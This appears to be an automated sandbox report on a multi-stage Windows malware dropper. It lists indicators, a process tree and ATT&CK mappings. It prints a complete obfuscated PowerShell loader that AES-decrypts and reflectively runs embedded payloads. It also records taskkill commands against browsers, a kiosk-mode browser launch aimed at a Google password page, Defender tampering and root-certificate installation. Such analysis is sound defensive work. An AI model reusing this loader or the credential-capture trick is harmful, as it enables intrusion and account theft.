Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	9e5af0f2e5.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
2460	skotes.exe
2492	stories.tmp
2492	stories.tmp
1928	powershell.exe
2320	f50b4ce47b.exe
1908	296ffac9f0.exe
1908	296ffac9f0.exe
1908	296ffac9f0.exe
1908	296ffac9f0.exe
1908	296ffac9f0.exe
1908	296ffac9f0.exe
2416	9e5af0f2e5.exe
1220	aeabcf6669.exe
2600	219824b5d6.exe
1712	GI59vO6.exe
3368	8f8bb19d95.exe
3368	8f8bb19d95.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
3368	8f8bb19d95.exe
3368	8f8bb19d95.exe
3852	rhnew.exe
3852	rhnew.exe
3852	rhnew.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	1744	firefox.exe
Token: SeDebugPrivilege	1744	firefox.exe
Token: SeDebugPrivilege	3368	8f8bb19d95.exe

Suspicious use of FindShellTrayWindow 16 IoCs

pid	Process
1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
2492	stories.tmp
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
1744	firefox.exe
1744	firefox.exe
1744	firefox.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe
2600	219824b5d6.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1596 wrote to memory of 2460	1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe	28
PID 1596 wrote to memory of 2460	1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe	28
PID 1596 wrote to memory of 2460	1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe	28
PID 1596 wrote to memory of 2460	1596	f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe	28
PID 2460 wrote to memory of 1776	2460	skotes.exe	30
PID 2460 wrote to memory of 1776	2460	skotes.exe	30
PID 2460 wrote to memory of 1776	2460	skotes.exe	30
PID 2460 wrote to memory of 1776	2460	skotes.exe	30
PID 2460 wrote to memory of 1776	2460	skotes.exe	30
PID 2460 wrote to memory of 1776	2460	skotes.exe	30
PID 2460 wrote to memory of 1776	2460	skotes.exe	30
PID 1776 wrote to memory of 2492	1776	stories.exe	31
PID 1776 wrote to memory of 2492	1776	stories.exe	31
PID 1776 wrote to memory of 2492	1776	stories.exe	31
PID 1776 wrote to memory of 2492	1776	stories.exe	31
PID 1776 wrote to memory of 2492	1776	stories.exe	31
PID 1776 wrote to memory of 2492	1776	stories.exe	31
PID 1776 wrote to memory of 2492	1776	stories.exe	31
PID 2492 wrote to memory of 1724	2492	stories.tmp	32
PID 2492 wrote to memory of 1724	2492	stories.tmp	32
PID 2492 wrote to memory of 1724	2492	stories.tmp	32
PID 2492 wrote to memory of 1724	2492	stories.tmp	32
PID 2492 wrote to memory of 2508	2492	stories.tmp	34
PID 2492 wrote to memory of 2508	2492	stories.tmp	34
PID 2492 wrote to memory of 2508	2492	stories.tmp	34
PID 2492 wrote to memory of 2508	2492	stories.tmp	34
PID 1724 wrote to memory of 1688	1724	net.exe	35
PID 1724 wrote to memory of 1688	1724	net.exe	35
PID 1724 wrote to memory of 1688	1724	net.exe	35
PID 1724 wrote to memory of 1688	1724	net.exe	35
PID 2460 wrote to memory of 604	2460	skotes.exe	38
PID 2460 wrote to memory of 604	2460	skotes.exe	38
PID 2460 wrote to memory of 604	2460	skotes.exe	38
PID 2460 wrote to memory of 604	2460	skotes.exe	38
PID 2460 wrote to memory of 604	2460	skotes.exe	38
PID 2460 wrote to memory of 604	2460	skotes.exe	38
PID 2460 wrote to memory of 604	2460	skotes.exe	38
PID 604 wrote to memory of 1840	604	cmd.exe	40
PID 604 wrote to memory of 1840	604	cmd.exe	40
PID 604 wrote to memory of 1840	604	cmd.exe	40
PID 604 wrote to memory of 1840	604	cmd.exe	40
PID 604 wrote to memory of 1928	604	cmd.exe	41
PID 604 wrote to memory of 1928	604	cmd.exe	41
PID 604 wrote to memory of 1928	604	cmd.exe	41
PID 604 wrote to memory of 1928	604	cmd.exe	41
PID 2460 wrote to memory of 1712	2460	skotes.exe	42
PID 2460 wrote to memory of 1712	2460	skotes.exe	42
PID 2460 wrote to memory of 1712	2460	skotes.exe	42
PID 2460 wrote to memory of 1712	2460	skotes.exe	42
PID 2460 wrote to memory of 2320	2460	skotes.exe	43
PID 2460 wrote to memory of 2320	2460	skotes.exe	43
PID 2460 wrote to memory of 2320	2460	skotes.exe	43
PID 2460 wrote to memory of 2320	2460	skotes.exe	43
PID 2460 wrote to memory of 1908	2460	skotes.exe	44
PID 2460 wrote to memory of 1908	2460	skotes.exe	44
PID 2460 wrote to memory of 1908	2460	skotes.exe	44
PID 2460 wrote to memory of 1908	2460	skotes.exe	44
PID 2460 wrote to memory of 2416	2460	skotes.exe	46
PID 2460 wrote to memory of 2416	2460	skotes.exe	46
PID 2460 wrote to memory of 2416	2460	skotes.exe	46
PID 2460 wrote to memory of 2416	2460	skotes.exe	46
PID 2460 wrote to memory of 1220	2460	skotes.exe	47
PID 2460 wrote to memory of 1220	2460	skotes.exe	47
PID 2460 wrote to memory of 1220	2460	skotes.exe	47

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe
"C:\Users\Admin\AppData\Local\Temp\f30429f1257341aa2012149406181c128ebc53b3fcce11a482ea6266e5a00664.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1596
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
    "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\is-12PIQ.tmp\stories.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-12PIQ.tmp\stories.tmp" /SL5="$401CA,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2492
    - - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" pause video_jet_1235
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1724
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 pause video_jet_1235
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1688
    - - C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe
        
        "C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:604
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\UpdatedAgain.cmd';$mlaR='InaHWTvaHWTokaHWTeaHWT'.Replace('aHWT', ''),'GoEqIetoEqICuoEqIrroEqIentoEqIProEqIooEqIcoEqIeoEqIssoEqI'.Replace('oEqI', ''),'ElcnPTemcnPTencnPTtAcnPTtcnPT'.Replace('cnPT', ''),'LVXBNoadVXBN'.Replace('VXBN', ''),'FrSQcEoSQcEmBSQcEaSQcEse6SQcE4SQcEStrSQcEinSQcEgSQcE'.Replace('SQcE', ''),'ChhnmsanhnmsghnmseExhnmstehnmsnsihnmsonhnms'.Replace('hnms', ''),'MOYmhaOYmhinMOYmhoduOYmhleOYmh'.Replace('OYmh', ''),'DezNFDcomzNFDpzNFDrezNFDsszNFD'.Replace('zNFD', ''),'RUdUPeaUdUPdLUdUPinUdUPesUdUP'.Replace('UdUP', ''),'EnXsXntXsXnrXsXnyPoXsXninXsXntXsXn'.Replace('XsXn', ''),'CrQiuaeQiuaateQiuaDeQiuacQiuarQiuaypQiuatQiuaorQiua'.Replace('Qiua', ''),'CopwpFTyTowpFT'.Replace('wpFT', ''),'SpzcNflizcNftzcNf'.Replace('zcNf', ''),'TZlhXrZlhXanZlhXsfoZlhXrZlhXmFZlhXinZlhXaZlhXlZlhXBlZlhXockZlhX'.Replace('ZlhX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($mlaR[1])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function xlgJw($THCaC){$tnIYs=[System.Security.Cryptography.Aes]::Create();$tnIYs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tnIYs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tnIYs.Key=[System.Convert]::($mlaR[4])('nn1oVgQf+vsVUwhFRI0DoffekxC7+zU06CysJKUG7/E=');$tnIYs.IV=[System.Convert]::($mlaR[4])('vS7iVHdVCr38C0HCS9OQuA==');$GnhUQ=$tnIYs.($mlaR[10])();$mheDM=$GnhUQ.($mlaR[13])($THCaC,0,$THCaC.Length);$GnhUQ.Dispose();$tnIYs.Dispose();$mheDM;}function uRupt($THCaC){$rILnk=New-Object System.IO.MemoryStream(,$THCaC);$mMQDJ=New-Object System.IO.MemoryStream;$xKbEF=New-Object System.IO.Compression.GZipStream($rILnk,[IO.Compression.CompressionMode]::($mlaR[7]));$xKbEF.($mlaR[11])($mMQDJ);$xKbEF.Dispose();$rILnk.Dispose();$mMQDJ.Dispose();$mMQDJ.ToArray();}$KWCnK=[System.IO.File]::($mlaR[8])([Console]::Title);$MFCGw=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 5).Substring(2))));$CAxSJ=uRupt (xlgJw ([Convert]::($mlaR[4])([System.Linq.Enumerable]::($mlaR[2])($KWCnK, 6).Substring(2))));[System.Reflection.Assembly]::($mlaR[3])([byte[]]$CAxSJ).($mlaR[9]).($mlaR[0])($null,$null);[System.Reflection.Assembly]::($mlaR[3])([byte[]]$MFCGw).($mlaR[9]).($mlaR[0])($null,$null); "
      4⤵
      System Location Discovery: System Language Discovery
      PID:1840
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1928
- - C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
    "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:1712
- - C:\Users\Admin\AppData\Local\Temp\1011866001\f50b4ce47b.exe
    "C:\Users\Admin\AppData\Local\Temp\1011866001\f50b4ce47b.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2320
- - C:\Users\Admin\AppData\Local\Temp\1011867001\296ffac9f0.exe
    "C:\Users\Admin\AppData\Local\Temp\1011867001\296ffac9f0.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1908
- - C:\Users\Admin\AppData\Local\Temp\1011868001\9e5af0f2e5.exe
    "C:\Users\Admin\AppData\Local\Temp\1011868001\9e5af0f2e5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:2416
- - C:\Users\Admin\AppData\Local\Temp\1011869001\aeabcf6669.exe
    "C:\Users\Admin\AppData\Local\Temp\1011869001\aeabcf6669.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1220
- - C:\Users\Admin\AppData\Local\Temp\1011870001\219824b5d6.exe
    "C:\Users\Admin\AppData\Local\Temp\1011870001\219824b5d6.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2600
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2040
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2428
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1248
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2128
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:1732
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1744
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1744.0.1465278445\681875889" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1080 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {19f341a9-e970-4e28-a7f9-0aa56e39dfab} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" 1316 104d5558 gpu
        6⤵
        
        PID:2916
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1744.1.534823473\1484351499" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ee5d68f-493f-4231-a449-4b656a2f5670} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" 1564 f2eb258 socket
        6⤵
        
        PID:2096
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1744.2.495993832\298540103" -childID 1 -isForBrowser -prefsHandle 2012 -prefMapHandle 2008 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4089f41-d5d7-449a-88d6-f6543e96c740} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" 2024 1887af58 tab
        6⤵
        
        PID:852
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1744.3.1750912494\995393658" -childID 2 -isForBrowser -prefsHandle 2564 -prefMapHandle 2560 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5dc12782-3811-4581-85ae-3408ff09c7e6} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" 2576 d5d258 tab
        6⤵
        
        PID:2588
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1744.4.873273887\1243129849" -childID 3 -isForBrowser -prefsHandle 3684 -prefMapHandle 3680 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {97c1a236-8ea8-407c-913c-be78367d9f95} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" 3440 1c2bb558 tab
        6⤵
        
        PID:792
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1744.5.739880410\8240215" -childID 4 -isForBrowser -prefsHandle 3804 -prefMapHandle 3808 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {792609b5-ded4-4896-ae88-de567c35a9a5} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" 3792 1c2bbb58 tab
        6⤵
        
        PID:2224
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1744.6.853424248\1735257715" -childID 5 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 576 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3aeb3ccf-cfcc-45b0-ac3a-142ad2784ccc} 1744 "\\.\pipe\gecko-crash-server-pipe.1744" 3976 1c2bc158 tab
        6⤵
        
        PID:1720
- - C:\Users\Admin\AppData\Local\Temp\1011871001\8f8bb19d95.exe
    "C:\Users\Admin\AppData\Local\Temp\1011871001\8f8bb19d95.exe"
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3368
- - C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe
    "C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion